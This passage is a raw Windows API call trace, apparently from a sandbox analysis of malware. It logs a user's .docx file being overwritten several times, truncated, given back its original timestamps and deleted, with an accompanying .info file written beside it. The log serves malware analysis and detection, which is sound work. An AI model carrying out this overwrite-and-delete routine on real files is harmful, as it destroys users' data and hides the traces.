hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.578] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.578] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.579] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.580] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.580] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x240, lpOverlapped=0x0) returned 1 [0073.580] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0073.580] CloseHandle (hObject=0x36c) returned 1 [0073.582] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9.info", lpFilePart=0x0) returned 0x4d [0073.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0073.582] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f05ad38b9c3dede4b5e465375377ebc9.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.582] GetFileType (hFile=0x36c) returned 0x1 [0073.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0073.582] GetFileType (hFile=0x36c) returned 0x1 [0073.582] WriteFile (in: hFile=0x36c, lpBuffer=0x21a4e28*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x21a4e28*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0073.583] CloseHandle (hObject=0x36c) returned 1 [0073.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0073.584] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfabad820, ftCreationTime.dwHighDateTime=0x1d53581, ftLastAccessTime.dwLowDateTime=0xa36e56d0, ftLastAccessTime.dwHighDateTime=0x1d53a5b, ftLastWriteTime.dwLowDateTime=0xa36e56d0, ftLastWriteTime.dwHighDateTime=0x1d53a5b, nFileSizeHigh=0x0, nFileSizeLow=0x1523f)) returned 1 [0073.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0073.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.584] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", dwFileAttributes=0x80) returned 1 [0073.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0073.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx"), fInfoLevelId=0x0, lpFileInformation=0x21aca30 | out: lpFileInformation=0x21aca30*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfabad820, ftCreationTime.dwHighDateTime=0x1d53581, ftLastAccessTime.dwLowDateTime=0xa36e56d0, ftLastAccessTime.dwHighDateTime=0x1d53a5b, ftLastWriteTime.dwLowDateTime=0xa36e56d0, ftLastWriteTime.dwHighDateTime=0x1d53a5b, nFileSizeHigh=0x0, nFileSizeLow=0x1523f)) returned 1 [0073.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0073.603] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0073.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.603] GetFileType (hFile=0x36c) returned 0x1 [0073.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0073.603] GetFileType (hFile=0x36c) returned 0x1 [0073.603] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.604] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.605] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.606] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.606] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.607] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.608] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.609] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.609] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.610] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.611] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.612] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.612] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.613] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.614] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.615] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.615] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.621] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.622] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.623] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.624] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.624] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.625] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5daa8*=0x400, lpOverlapped=0x0) returned 1 [0073.625] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.625] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.626] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.627] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.628] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.628] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.629] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.630] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.630] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.631] WriteFile (in: hFile=0x36c, lpBuffer=0x21acef8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x21acef8*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.633] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.633] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.634] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0073.634] SetEndOfFile (hFile=0x36c) returned 1 [0073.635] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0073.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.636] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0073.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.636] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0073.636] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.636] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.637] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0073.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.637] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx")) returned 1 [0073.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", lpFilePart=0x0) returned 0x48 [0073.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f05ad38b9c3dede4b5e465375377ebc9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.638] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0073.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", lpFilePart=0x0) returned 0x48 [0073.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f05ad38b9c3dede4b5e465375377ebc9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.638] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0073.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", lpFilePart=0x0) returned 0x48 [0073.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f05ad38b9c3dede4b5e465375377ebc9"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, 